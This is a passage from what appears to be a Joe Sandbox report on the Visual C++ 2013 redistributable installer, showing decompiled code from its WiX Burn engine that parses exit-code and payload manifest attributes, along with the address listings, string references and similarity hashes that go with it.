													_t172 = E012B54DD(_t151, _a4, L"AsyncUninstall", _t163 + 0xbc);
													__eflags = _t172 - 0x80070490;
													if(_t172 == 0x80070490) {
														L29:
														_t106 = E012B4F9E(_a4, L"ExitCode",  &_v20);
														__eflags = _t106;
														if(_t106 >= 0) {
															_t107 = _v20;
															_t152 =  *_t107;
															_t108 =  *((intOrPtr*)( *_t107 + 0x20))(_t107,  &_v16);
															__eflags = _t108;
															if(_t108 >= 0) {
																_t109 = _v16;
																__eflags = _t109;
																if(_t109 == 0) {
																	L62:
																	_t175 = 0;
																	__eflags = 0;
																} else {
																	_t117 = E012B233B(_t109 * 0xc, 1);
																	 *(_t163 + 0xc0) = _t117;
																	__eflags = _t117;
																	if(_t117 != 0) {
																		_t118 = _v16;
																		_v24 = _v24 & 0x00000000;
																		 *(_t163 + 0xc4) = _t118;
																		__eflags = _t118;
																		if(_t118 == 0) {
																			goto L62;
																		} else {
																			_t37 =  &_a8;
																			 *_t37 = _a8 & 0x00000000;
																			__eflags =  *_t37;
																			while(1) {
																				_a4 =  *(_t163 + 0xc0) + _a8;
																				_t175 = E012B5026(_t152, _v20,  &_v12, 0);
																				__eflags = _t175;
																				if(_t175 < 0) {
																					break;
																				}
																				_t175 = E012B540B(_v12, L"Type",  &_v8);
																				__eflags = _t175;
																				if(_t175 < 0) {
																					_push("Failed to get @Type.");
																					goto L76;
																				} else {
																					_t176 = _t175 | 0xffffffff;
																					_t126 = CompareStringW(0x7f, 0, _v8, _t176, L"success", _t176);
																					__eflags = _t126 - 2;
																					if(_t126 != 2) {
																						_t127 = CompareStringW(0x7f, 0, _v8, _t176, L"error", _t176);
																						_t157 = 2;
																						__eflags = _t127 - _t157;
																						if(_t127 != _t157) {
																							_t128 = CompareStringW(0x7f, 0, _v8, _t176, L"scheduleReboot", _t176);
																							__eflags = _t128 - 2;
																							if(_t128 != 2) {
																								_t129 = CompareStringW(0x7f, 0, _v8, _t176, L"forceReboot", _t176);
																								__eflags = _t129 - 2;
																								if(_t129 != 2) {
																									L70:
																									_push(_v8);
																									_t175 = 0x8000ffff;
																									_push("Invalid exit code type: %ls");
																									goto L72;
																								} else {
																									 *_a4 = 4;
																									goto L48;
																								}
																							} else {
																								 *_a4 = 3;
																								goto L48;
																							}
																						} else {
																							 *_a4 = _t157;
																							goto L48;
																						}
																					} else {
																						 *_a4 = 1;
																						L48:
																						_t175 = E012B540B(_v12, L"Code",  &_v8);
																						_t152 = 0;
																						__eflags = _t175;
																						if(_t175 < 0) {
																							_push("Failed to get @Code.");
																							goto L76;
																						} else {
																							_t134 = _v8;
																							_t160 = 0x2a;
																							__eflags = _t160 -  *_t134;
																							if(_t160 !=  *_t134) {
																								_v32 = 0;
																								_v28 = 0;
																								_t175 = E012B0352( &_v32, _t134, 0,  &_v32);
																								__eflags = _t175;
																								if(_t175 < 0) {
																									_push(_v8);
																									_push("Failed to parse @Code value: %ls");
																									goto L72;
																								} else {
																									_t162 = _v32;
																									_t152 = _t162 + 0x80000000;
																									asm("adc eax, 0x0");
																									__eflags = _v28;
																									if(__eflags > 0) {
																										L55:
																										__eflags = _v28;
																										if(__eflags > 0) {
																											L71:
																											_push(_v8);
																											_t175 = 0x8000ffff;
																											_push("Failed to convert @Code value: %ls");
																											L72:
																											_push(_t175);
																											E012AFA86();
																										} else {
																											if(__eflags < 0) {
																												goto L58;
																											} else {
																												__eflags = _t162 - 0x7fffffff;
																												if(_t162 > 0x7fffffff) {
																													goto L71;
																												} else {
																													goto L58;
																												}
																											}
																										}
																									} else {
																										if(__eflags < 0) {
																											L58:
																											_a4[1] = _t162;
																											goto L59;
																										} else {
																											__eflags = _t152 - 0x7fffffff;
																											if(_t152 <= 0x7fffffff) {
																												goto L58;
																											} else {
																												goto L55;
																											}
																										}
																									}
																								}
																							} else {
																								_a4[2] = 1;
																								L59:
																								_t138 = _v12;
																								__eflags = _t138;
																								if(_t138 != 0) {
																									_t152 =  *_t138;
																									 *((intOrPtr*)( *_t138 + 8))(_t138);
																									_t69 =  &_v12;
																									 *_t69 = _v12 & 0x00000000;
																									__eflags =  *_t69;
																								}
																								_v24 = _v24 + 1;
																								_a8 = _a8 + 0xc;
																								__eflags = _v24 - _v16;
																								if(_v24 < _v16) {
																									continue;
																								} else {
																									goto L62;
																								}
																							}
																						}
																					}
																				}
																				goto L63;
																			}
																			_push("Failed to get next node.");
																			goto L76;
																		}
																	} else {
																		_t175 = 0x8007000e;
																		E012B294E(_t117, "exeengine.cpp", 0x77, 0x8007000e);
																		_push("Failed to allocate memory for exit code structs.");
																		goto L76;
																	}
																}
															} else {
																_push("Failed to get exit code node count.");
																goto L76;
															}
														} else {
															_push("Failed to select exit code nodes.");
															goto L76;
														}
													} else {
														__eflags = _t172;
														if(_t172 >= 0) {
															goto L29;
														} else {
															_push("Failed to get @AsyncUninstall.");
															goto L76;
														}
													}
												} else {
													__eflags = _t171;
													if(_t171 >= 0) {
														goto L26;
													} else {
														_push("Failed to get @AsyncRepair.");
														goto L76;
													}
												}
											} else {
												__eflags = _t170;
												if(_t170 >= 0) {
													goto L23;
												} else {
													_push("Failed to get @AsyncInstall.");
													goto L76;
												}
											}
										}
									}
								} else {
									__eflags = _t168;
									if(_t168 >= 0) {
										goto L11;
									} else {
										_push("Failed to get @Repairable.");
										goto L76;
									}
								}
							} else {
								_push("Failed to get @RepairArguments.");
								goto L76;
							}
						} else {
							_push("Failed to get @UninstallArguments.");
							goto L76;
						}
					} else {
						_push("Failed to get @InstallArguments.");
						goto L76;
					}
				} else {
					_push("Failed to get @DetectCondition.");
					L76:
					_push(_t175);
					E012AFA86();
				}
				L63:
				_t110 = _v20;
				if(_t110 != 0) {
					 *((intOrPtr*)( *_t110 + 8))(_t110);
				}
				_t111 = _v12;
				if(_t111 != 0) {
					 *((intOrPtr*)( *_t111 + 8))(_t111);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t175;
			}

0x01299e55
0x01299e5c
0x01299e5f
0x01299e62
0x01299e65
0x01299e68
0x01299e81
0x01299e9a
0x01299ea1
0x01299ea3
0x01299ebc
0x01299ec3
0x01299ec5
0x01299ede
0x01299ee5
0x01299ee7
0x01299f05
0x01299f07
0x01299f0d
0x01299f1d
0x01299f32
0x01299f34
0x01299f36
0x01299fcb
0x01299fd1
0x00000000
0x01299fd3
0x01299fd3
0x00000000
0x01299fd3
0x01299f3c
0x01299f3c
0x01299f4d
0x01299f4f
0x01299f52
0x01299f98
0x01299f9c
0x01299f9d
0x01299f9f
0x01299fb7
0x01299fb9
0x01299fbc
0x00000000
0x01299fc2
0x01299fc2
0x00000000
0x01299fc2
0x01299fa1
0x01299fa1
0x00000000
0x01299fa1
0x01299f54
0x01299f54
0x01299f5e
0x01299f72
0x01299f74
0x01299f7a
0x01299fdd
0x01299ff1
0x01299ff3
0x01299ff9
0x0129a009
0x0129a01d
0x0129a01f
0x0129a025
0x0129a035
0x0129a041
0x0129a048
0x0129a04a
0x0129a056
0x0129a059
0x0129a060
0x0129a065
0x0129a067
0x0129a073
0x0129a076
0x0129a078
0x0129a232
0x0129a232
0x0129a232
0x0129a07e
0x0129a084
0x0129a089
0x0129a08f
0x0129a091
0x0129a0af
0x0129a0b2
0x0129a0b6
0x0129a0bc
0x0129a0be
0x00000000
0x0129a0c4
0x0129a0c4
0x0129a0c4
0x0129a0c4
0x0129a0c8
0x0129a0d3
0x0129a0e2
0x0129a0e4
0x0129a0e6
0x00000000
0x00000000
0x0129a0fd
0x0129a0ff
0x0129a101
0x0129a293
0x00000000
0x0129a107
0x0129a107
0x0129a118
0x0129a11a
0x0129a11d
0x0129a138
0x0129a13c
0x0129a13d
0x0129a13f
0x0129a156
0x0129a158
0x0129a15b
0x0129a176
0x0129a178
0x0129a17b
0x0129a265
0x0129a265
0x0129a268
0x0129a26d
0x00000000
0x0129a181
0x0129a184
0x00000000
0x0129a184
0x0129a15d
0x0129a160
0x00000000
0x0129a160
0x0129a141
0x0129a144
0x00000000
0x0129a144
0x0129a11f
0x0129a122
0x0129a18a
0x0129a19b
0x0129a19d
0x0129a19f
0x0129a1a1
0x0129a29a
0x00000000
0x0129a1a7
0x0129a1a7
0x0129a1ac
0x0129a1ad
0x0129a1b0
0x0129a1c4
0x0129a1c7
0x0129a1cf
0x0129a1d1
0x0129a1d3
0x0129a2a9
0x0129a2ac
0x00000000
0x0129a1d9
0x0129a1d9
0x0129a1e1
0x0129a1e7
0x0129a1ea
0x0129a1ec
0x0129a1f8
0x0129a1f8
0x0129a1fc
0x0129a274
0x0129a274
0x0129a277
0x0129a27c
0x0129a281
0x0129a281
0x0129a282
0x0129a1fe
0x0129a1fe
0x00000000
0x0129a200
0x0129a200
0x0129a206
0x00000000
0x00000000
0x00000000
0x00000000
0x0129a206
0x0129a1fe
0x0129a1ee
0x0129a1ee
0x0129a208
0x0129a20b
0x00000000
0x0129a1f0
0x0129a1f0
0x0129a1f6
0x00000000
0x00000000
0x00000000
0x00000000
0x0129a1f6
0x0129a1ee
0x0129a1ec
0x0129a1b2
0x0129a1b5
0x0129a20e
0x0129a20e
0x0129a211
0x0129a213
0x0129a215
0x0129a218
0x0129a21b
0x0129a21b
0x0129a21b
0x0129a21b
0x0129a21f
0x0129a225
0x0129a229
0x0129a22c
0x00000000
0x00000000
0x00000000
0x00000000
0x0129a22c
0x0129a1b0
0x0129a1a1
0x0129a11d
0x00000000
0x0129a101
0x0129a28c
0x00000000
0x0129a28c
0x0129a093
0x0129a093
0x0129a0a0
0x0129a0a5
0x00000000
0x0129a0a5
0x0129a091
0x0129a069
0x0129a069
0x00000000
0x0129a069
0x0129a04c
0x0129a04c
0x00000000
0x0129a04c
0x0129a027
0x0129a027
0x0129a029
0x00000000
0x0129a02b
0x0129a02b
0x00000000
0x0129a02b
0x0129a029
0x01299ffb
0x01299ffb
0x01299ffd
0x00000000
0x01299fff
0x01299fff
0x00000000
0x01299fff
0x01299ffd
0x01299f7c
0x01299f7c
0x01299f7e
0x00000000
0x01299f80
0x01299f80
0x00000000
0x01299f80
0x01299f7e
0x01299f7a
0x01299f52
0x01299f0f
0x01299f0f
0x01299f11
0x00000000
0x01299f13
0x01299f13
0x00000000
0x01299f13
0x01299f11
0x01299ee9
0x01299ee9
0x00000000
0x01299ee9
0x01299ec7
0x01299ec7
0x00000000
0x01299ec7
0x01299ea5
0x01299ea5
0x00000000
0x01299ea5
0x01299e83
0x01299e83
0x0129a29f
0x0129a29f
0x0129a2a0
0x0129a2a6
0x0129a234
0x0129a234
0x0129a239
0x0129a23e
0x0129a23e
0x0129a241
0x0129a246
0x0129a24b
0x0129a24b
0x0129a252
0x0129a257
0x0129a257
0x0129a262

Strings

Failed to select exit code nodes., xrefs: 0129A04C
AsyncInstall, xrefs: 01299F65
RepairArguments, xrefs: 01299ED8
AsyncRepair, xrefs: 01299FE4
Type, xrefs: 0129A0F0
exeengine.cpp, xrefs: 0129A09B
DetectCondition, xrefs: 01299E72
Failed to get @AsyncRepair., xrefs: 01299FFF
forceReboot, xrefs: 0129A169
AsyncUninstall, xrefs: 0129A010
UninstallArguments, xrefs: 01299EB6
Failed to allocate memory for exit code structs., xrefs: 0129A0A5
burn, xrefs: 01299F40
Code, xrefs: 0129A18E
Failed to convert @Code value: %ls, xrefs: 0129A27C
scheduleReboot, xrefs: 0129A149
Failed to get next node., xrefs: 0129A28C
Failed to parse @Code value: %ls, xrefs: 0129A2AC
none, xrefs: 01299FAA
Failed to get exit code node count., xrefs: 0129A069
Failed to get @DetectCondition., xrefs: 01299E83
Failed to get @UninstallArguments., xrefs: 01299EC7
Failed to get @AsyncUninstall., xrefs: 0129A02B
Failed to get @AsyncInstall., xrefs: 01299F80
Repairable, xrefs: 01299EFA
error, xrefs: 0129A12B
Failed to get @Type., xrefs: 0129A293
success, xrefs: 0129A10B
Failed to get @Code., xrefs: 0129A29A
Invalid exit code type: %ls, xrefs: 0129A26D
netfx4, xrefs: 01299F8B
Failed to get @RepairArguments., xrefs: 01299EE9
Failed to get @InstallArguments., xrefs: 01299EA5
Protocol, xrefs: 01299F21
Failed to get @Protocol., xrefs: 01299FD3
Failed to get @Repairable., xrefs: 01299F13
ExitCode, xrefs: 0129A039
InstallArguments, xrefs: 01299E94

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: AsyncInstall$AsyncRepair$AsyncUninstall$Code$DetectCondition$ExitCode$Failed to allocate memory for exit code structs.$Failed to convert @Code value: %ls$Failed to get @AsyncInstall.$Failed to get @AsyncRepair.$Failed to get @AsyncUninstall.$Failed to get @Code.$Failed to get @DetectCondition.$Failed to get @InstallArguments.$Failed to get @Protocol.$Failed to get @RepairArguments.$Failed to get @Repairable.$Failed to get @Type.$Failed to get @UninstallArguments.$Failed to get exit code node count.$Failed to get next node.$Failed to parse @Code value: %ls$Failed to select exit code nodes.$InstallArguments$Invalid exit code type: %ls$Protocol$RepairArguments$Repairable$Type$UninstallArguments$burn$error$exeengine.cpp$forceReboot$netfx4$none$scheduleReboot$success
API String ID: 760788290-4137368201
Opcode ID: c78fa8b52aaa27d224255581c3fe602b091e15d35f6dfb84e61c380058d90e4d
Instruction ID: bb048ef7220e1e97bfb2bc9649d3b0a3e5620f1cfe64fef8ed756a53aac7321a
Opcode Fuzzy Hash: c78fa8b52aaa27d224255581c3fe602b091e15d35f6dfb84e61c380058d90e4d
Instruction Fuzzy Hash: 46C1E871EB0726BBDF119B6DCC41FAEBB64FF00B60F104259FA15AB250D7B599408790

Uniqueness

Uniqueness Score: -1.00%

Function 01284D71 Relevance: 75.6, APIs: 3, Strings: 40, Instructions: 363
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E01284D71(void* __ebx, signed int* _a4, signed int _a8, intOrPtr _a12, short* _a16) {
				short* _v8;
				signed int _v12;
				short* _v16;
				void* _v20;
				short* _v24;
				intOrPtr* _t89;
				signed int _t91;
				intOrPtr* _t92;
				signed int _t93;
				signed int _t99;
				signed int _t100;
				int _t109;
				int _t110;
				int _t111;
				signed int _t132;
				signed int* _t156;
				void* _t165;
				signed int _t168;

				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(E012B4F9E(_a16, L"Payload",  &_v20) >= 0) {
					_t89 = _v20;
					_t162 =  &_v16;
					_t168 =  *((intOrPtr*)( *_t89 + 0x20))(_t89,  &_v16);
					__eflags = _t168;
					if(_t168 >= 0) {
						_t91 = _v16;
						__eflags = _t91;
						if(_t91 != 0) {
							_t99 = E012B233B(_t91 * 0x58, 1);
							_t156 = _a4;
							 *_t156 = _t99;
							__eflags = _t99;
							if(_t99 != 0) {
								_t100 = _v16;
								_t156[1] = _t100;
								_v24 = 0;
								__eflags = _t100;
								if(_t100 <= 0) {
									L73:
									_t168 = 0;
									__eflags = 0;
								} else {
									_a16 = 0;
									while(1) {
										_t165 =  *_t156 + _a16;
										_t168 = E012B5026(_t156, _v20,  &_v12, 0);
										__eflags = _t168;
										if(_t168 < 0) {
											break;
										}
										_t168 = E012B540B(_v12, L"Id", _t165);
										__eflags = _t168;
										if(_t168 < 0) {
											_push("Failed to get @Id.");
											goto L72;
										} else {
											_t20 = _t165 + 0x18; // 0x70
											_t168 = E012B540B(_v12, L"FilePath", _t20);
											__eflags = _t168;
											if(_t168 < 0) {
												_push("Failed to get @FilePath.");
												goto L72;
											} else {
												_t168 = E012B540B(_v12, L"Packaging",  &_v8);
												__eflags = _t168;
												if(_t168 < 0) {
													_push("Failed to get @Packaging.");
													goto L72;
												} else {
													_t109 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"download", 0xffffffff);
													__eflags = _t109 - 2;
													if(_t109 != 2) {
														_t110 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"embedded", 0xffffffff);
														_t156 = 2;
														__eflags = _t110 - _t156;
														if(_t110 != _t156) {
															_t111 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"external", 0xffffffff);
															__eflags = _t111 - 2;
															if(_t111 != 2) {
																_push(_v8);
																_t168 = 0x80070057;
																_push("Invalid value for @Packaging: %ls");
																goto L58;
															} else {
																 *(_t165 + 4) = 3;
																goto L20;
															}
														} else {
															 *(_t165 + 4) = _t156;
															goto L20;
														}
													} else {
														 *(_t165 + 4) = 1;
														L20:
														__eflags = _a8;
														if(_a8 == 0) {
															L25:
															_t37 = _t165 + 8; // 0x60
															_t168 = E012B54DD(_t156, _v12, L"LayoutOnly", _t37);
															__eflags = _t168 - 0x80070490;
															if(_t168 == 0x80070490) {
																L27:
																_t39 = _t165 + 0x38; // 0x90
																_t168 = E012B540B(_v12, L"SourcePath", _t39);
																__eflags = _t168 - 0x80070490;
																if(_t168 != 0x80070490) {
																	L29:
																	__eflags = _t168;
																	if(_t168 < 0) {
																		_push("Failed to get @SourcePath.");
																		goto L72;
																	} else {
																		goto L30;
																	}
																} else {
																	__eflags =  *(_t165 + 4) - 1;
																	if( *(_t165 + 4) == 1) {
																		L30:
																		_t42 = _t165 + 0x40; // 0x98
																		_t168 = E012B540B(_v12, L"DownloadUrl", _t42);
																		__eflags = _t168 - 0x80070490;
																		if(_t168 != 0x80070490) {
																			L32:
																			__eflags = _t168;
																			if(_t168 < 0) {
																				_push("Failed to get @DownloadUrl.");
																				goto L72;
																			} else {
																				goto L33;
																			}
																		} else {
																			__eflags =  *(_t165 + 4) - 1;
																			if( *(_t165 + 4) != 1) {
																				L33:
																				_t168 = E012B540B(_v12, L"FileSize",  &_v8);
																				__eflags = _t168 - 0x80070490;
																				if(_t168 == 0x80070490) {
																					L36:
																					_t168 = E012B540B(_v12, L"CertificateRootPublicKeyIdentifier",  &_v8);
																					__eflags = _t168 - 0x80070490;
																					if(_t168 == 0x80070490) {
																						L39:
																						_t168 = E012B540B(_v12, L"CertificateRootThumbprint",  &_v8);
																						__eflags = _t168 - 0x80070490;
																						if(_t168 == 0x80070490) {
																							L42:
																							_t168 = E012B540B(_v12, L"Hash",  &_v8);
																							__eflags = _t168;
																							if(__eflags < 0) {
																								_push("Failed to get @Hash.");
																								goto L72;
																							} else {
																								_t61 = _t165 + 0x34; // 0x8c
																								_t62 = _t165 + 0x30; // 0x88
																								_t168 = E012B15AE(_t156, __eflags, _v8, _t62, _t61);
																								__eflags = _t168;
																								if(_t168 < 0) {
																									_push("Failed to hex decode the Payload/@Hash.");
																									goto L72;
																								} else {
																									_t168 = E012B540B(_v12, L"Catalog",  &_v8);
																									__eflags = _t168 - 0x80070490;
																									if(_t168 == 0x80070490) {
																										L47:
																										_t132 = _v12;
																										__eflags = _t132;
																										if(_t132 != 0) {
																											 *((intOrPtr*)( *_t132 + 8))(_t132);
																											_t70 =  &_v12;
																											 *_t70 = _v12 & 0x00000000;
																											__eflags =  *_t70;
																										}
																										_v24 = _v24 + 1;
																										_a16 = _a16 + 0x58;
																										__eflags = _v24 - _v16;
																										if(_v24 >= _v16) {
																											goto L73;
																										} else {
																											_t156 = _a4;
																											continue;
																										}
																									} else {
																										__eflags = _t168;
																										if(_t168 < 0) {
																											_push("Failed to get @Catalog.");
																											goto L72;
																										} else {
																											_t168 = E01283CC0(_t156, _a12, _v8, _t165 + 0x1c);
																											__eflags = _t168;
																											if(_t168 < 0) {
																												_push("Failed to find catalog.");
																												goto L72;
																											} else {
																												goto L47;
																											}
																										}
																									}
																								}
																							}
																						} else {
																							__eflags = _t168;
																							if(__eflags < 0) {
																								_push("Failed to get @CertificateRootThumbprint.");
																								goto L72;
																							} else {
																								_t56 = _t165 + 0x2c; // 0x84
																								_t57 = _t165 + 0x28; // 0x80
																								_t168 = E012B15AE(_t156, __eflags, _v8, _t57, _t56);
																								__eflags = _t168;
																								if(_t168 < 0) {
																									_push("Failed to hex decode @CertificateRootThumbprint.");
																									goto L72;
																								} else {
																									goto L42;
																								}
																							}
																						}
																					} else {
																						__eflags = _t168;
																						if(__eflags < 0) {
																							_push("Failed to get @CertificateRootPublicKeyIdentifier.");
																							goto L72;
																						} else {
																							_t51 = _t165 + 0x24; // 0x7c
																							_t52 = _t165 + 0x20; // 0x78
																							_t168 = E012B15AE(_t156, __eflags, _v8, _t52, _t51);
																							__eflags = _t168;
																							if(_t168 < 0) {
																								_push("Failed to hex decode @CertificateRootPublicKeyIdentifier.");
																								goto L72;
																							} else {
																								goto L39;
																							}
																						}
																					}
																				} else {
																					__eflags = _t168;
																					if(_t168 < 0) {
																						_push("Failed to get @FileSize.");
																						goto L72;
																					} else {
																						_t47 = _t165 + 0x10; // 0x68
																						_t168 = E012B0403(_t162, _v8, 0, _t47);
																						__eflags = _t168;
																						if(_t168 < 0) {
																							_push("Failed to parse @FileSize.");
																							goto L72;
																						} else {
																							goto L36;
																						}
																					}
																				}
																			} else {
																				goto L32;
																			}
																		}
																	} else {
																		goto L29;
																	}
																}
															} else {
																__eflags = _t168;
																if(_t168 < 0) {
																	_push("Failed to get @LayoutOnly.");
																	goto L72;
																} else {
																	goto L27;
																}
															}
														} else {
															_t168 = E012B540B(_v12, L"Container",  &_v8);
															__eflags = _t168 - 0x80070490;
															if(_t168 != 0x80070490) {
																L23:
																__eflags = _t168;
																if(_t168 < 0) {
																	_push("Failed to get @Container.");
																	L72:
																	_push(_t168);
																	E012AFA86();
																} else {
																	_t34 = _t165 + 0x3c; // 0x94
																	_t168 = E012A012A(_t156, _a8, _v8, _t34);
																	__eflags = _t168;
																	if(_t168 < 0) {
																		_push(_v8);
																		_push("Failed to to find container: %ls");
																		L58:
																		_push(_t168);
																		E012AFA86();
																	} else {
																		goto L25;
																	}
																}
															} else {
																__eflags =  *(_t165 + 4) - 2;
																if( *(_t165 + 4) != 2) {
																	goto L25;
																} else {
																	goto L23;
																}
															}
														}
													}
												}
											}
										}
										goto L74;
									}
									_push("Failed to get next node.");
									goto L72;
								}
								L74:
							} else {
								_t168 = 0x8007000e;
								E012B294E(_t99, "payload.cpp", 0x36, 0x8007000e);
								_push("Failed to allocate memory for payload structs.");
								goto L7;
							}
						}
					} else {
						_push("Failed to get payload node count.");
						goto L7;
					}
				} else {
					_push("Failed to select payload nodes.");
					L7:
					_push(_t168);
					E012AFA86();
				}
				_t92 = _v20;
				if(_t92 != 0) {
					 *((intOrPtr*)( *_t92 + 8))(_t92);
				}
				_t93 = _v12;
				if(_t93 != 0) {
					 *((intOrPtr*)( *_t93 + 8))(_t93);
				}
				if(_v8 != 0) {
					E012B01E8(_v8);
				}
				return _t168;
			}

0x01284d87
0x01284d8a
0x01284d8d
0x01284d90
0x01284d9c
0x01284da5
0x01284daa
0x01284db2
0x01284db4
0x01284db6
0x01284dbf
0x01284dc2
0x01284dc4
0x01284dd0
0x01284dd5
0x01284dd8
0x01284dda
0x01284ddc
0x01284e02
0x01284e06
0x01284e09
0x01284e0c
0x01284e0e
0x0128518a
0x0128518a
0x0128518a
0x01284e14
0x01284e14
0x01284e1c
0x01284e1e
0x01284e2f
0x01284e31
0x01284e33
0x00000000
0x00000000
0x01284e47
0x01284e49
0x01284e4b
0x012850f5
0x00000000
0x01284e51
0x01284e51
0x01284e62
0x01284e64
0x01284e66
0x012850ff
0x00000000
0x01284e6c
0x01284e7d
0x01284e7f
0x01284e81
0x01285106
0x00000000
0x01284e87
0x01284e9d
0x01284e9f
0x01284ea2
0x01284ebd
0x01284ec1
0x01284ec2
0x01284ec4
0x01284edb
0x01284edd
0x01284ee0
0x012850dc
0x012850df
0x012850e4
0x00000000
0x01284ee6
0x01284ee6
0x00000000
0x01284ee6
0x01284ec6
0x01284ec6
0x00000000
0x01284ec6
0x01284ea4
0x01284ea4
0x01284eed
0x01284eed
0x01284ef1
0x01284f31
0x01284f31
0x01284f42
0x01284f44
0x01284f46
0x01284f50
0x01284f50
0x01284f61
0x01284f63
0x01284f65
0x01284f6d
0x01284f6d
0x01284f6f
0x0128512e
0x00000000
0x00000000
0x00000000
0x00000000
0x01284f67
0x01284f67
0x01284f6b
0x01284f75
0x01284f75
0x01284f86
0x01284f88
0x01284f8a
0x01284f92
0x01284f92
0x01284f94
0x01285135
0x00000000
0x00000000
0x00000000
0x00000000
0x01284f8c
0x01284f8c
0x01284f90
0x01284f9a
0x01284fab
0x01284fad
0x01284faf
0x01284fd1
0x01284fe2
0x01284fe4
0x01284fe6
0x0128500a
0x0128501b
0x0128501d
0x0128501f
0x01285043
0x01285054
0x01285056
0x01285058
0x01285166
0x00000000
0x0128505e
0x0128505e
0x01285062
0x0128506e
0x01285070
0x01285072
0x0128516d
0x00000000
0x01285078
0x01285089
0x0128508b
0x0128508d
0x012850b0
0x012850b0
0x012850b3
0x012850b5
0x012850ba
0x012850bd
0x012850bd
0x012850bd
0x012850bd
0x012850c1
0x012850c7
0x012850cb
0x012850ce
0x00000000
0x012850d4
0x012850d4
0x00000000
0x012850d4
0x0128508f
0x0128508f
0x01285091
0x01285174
0x00000000
0x01285097
0x012850a6
0x012850a8
0x012850aa
0x0128517b
0x00000000
0x00000000
0x00000000
0x00000000
0x012850aa
0x01285091
0x0128508d
0x01285072
0x01285021
0x01285021
0x01285023
0x01285158
0x00000000
0x01285029
0x01285029
0x0128502d
0x01285039
0x0128503b
0x0128503d
0x0128515f
0x00000000
0x00000000
0x00000000
0x00000000
0x0128503d
0x01285023
0x01284fe8
0x01284fe8
0x01284fea
0x0128514a
0x00000000
0x01284ff0
0x01284ff0
0x01284ff4
0x01285000
0x01285002
0x01285004
0x01285151
0x00000000
0x00000000
0x00000000
0x00000000
0x01285004
0x01284fea
0x01284fb1
0x01284fb1
0x01284fb3
0x0128513c
0x00000000
0x01284fb9
0x01284fb9
0x01284fc7
0x01284fc9
0x01284fcb
0x01285143
0x00000000
0x00000000
0x00000000
0x00000000
0x01284fcb
0x01284fb3
0x00000000
0x00000000
0x00000000
0x01284f90
0x00000000
0x00000000
0x00000000
0x01284f6b
0x01284f48
0x01284f48
0x01284f4a
0x01285127
0x00000000
0x00000000
0x00000000
0x00000000
0x01284f4a
0x01284ef3
0x01284f04
0x01284f06
0x01284f08
0x01284f10
0x01284f10
0x01284f12
0x0128510d
0x01285180
0x01285180
0x01285181
0x01284f18
0x01284f18
0x01284f27
0x01284f29
0x01284f2b
0x01285114
0x01285117
0x0128511c
0x0128511c
0x0128511d
0x00000000
0x00000000
0x00000000
0x01284f2b
0x01284f0a
0x01284f0a
0x01284f0e
0x00000000
0x00000000
0x00000000
0x00000000
0x01284f0e
0x01284f08
0x01284ef1
0x01284ea2
0x01284e81
0x01284e66
0x00000000
0x01284e4b
0x012850eb
0x00000000
0x012850eb
0x0128518c
0x01284dde
0x01284dde
0x01284deb
0x01284df0
0x00000000
0x01284df0
0x01284ddc
0x01284db8
0x01284db8
0x00000000
0x01284db8
0x01284d9e
0x01284d9e
0x01284df5
0x01284df5
0x01284df6
0x01284dfc
0x0128518d
0x01285192
0x01285197
0x01285197
0x0128519a
0x0128519f
0x012851a4
0x012851a4
0x012851ab
0x012851b0
0x012851b0
0x012851ba

APIs

Part of subcall function 012B540B: VariantInit.OLEAUT32(?), ref: 012B5421
Part of subcall function 012B540B: SysAllocString.OLEAUT32(?), ref: 012B543D
Part of subcall function 012B540B: VariantClear.OLEAUT32(?), ref: 012B54C4
Part of subcall function 012B540B: SysFreeString.OLEAUT32(00000000), ref: 012B54CF

CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000001,Packaging,00000000,00000001,FilePath,?,00000001,012BBBB0,?,00000000), ref: 01284E9D
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,embedded,000000FF), ref: 01284EBD
CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,external,000000FF), ref: 01284EDB

Strings

FileSize, xrefs: 01284F9E
Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0128514A
Catalog, xrefs: 0128507C
Packaging, xrefs: 01284E70
Failed to get @FilePath., xrefs: 012850FF
Failed to parse @FileSize., xrefs: 01285143
Failed to get @Hash., xrefs: 01285166
Failed to select payload nodes., xrefs: 01284D9E
CertificateRootThumbprint, xrefs: 0128500E
Failed to get @Catalog., xrefs: 01285174
SourcePath, xrefs: 01284F54
Failed to to find container: %ls, xrefs: 01285117
external, xrefs: 01284ECD
Failed to get next node., xrefs: 012850EB
download, xrefs: 01284E8F
Failed to allocate memory for payload structs., xrefs: 01284DF0
Failed to get payload node count., xrefs: 01284DB8
DownloadUrl, xrefs: 01284F79
CertificateRootPublicKeyIdentifier, xrefs: 01284FD5
embedded, xrefs: 01284EAF
Failed to hex decode the Payload/@Hash., xrefs: 0128516D
LayoutOnly, xrefs: 01284F35
Failed to get @FileSize., xrefs: 0128513C
X, xrefs: 012850C7
Failed to hex decode @CertificateRootThumbprint., xrefs: 0128515F
Payload, xrefs: 01284D7F
FilePath, xrefs: 01284E55
payload.cpp, xrefs: 01284DE6
Invalid value for @Packaging: %ls, xrefs: 012850E4
Failed to get @LayoutOnly., xrefs: 01285127
Failed to get @SourcePath., xrefs: 0128512E
Failed to get @Container., xrefs: 0128510D
Failed to get @CertificateRootThumbprint., xrefs: 01285158
Container, xrefs: 01284EF7
Hash, xrefs: 01285047
Failed to get @Id., xrefs: 012850F5
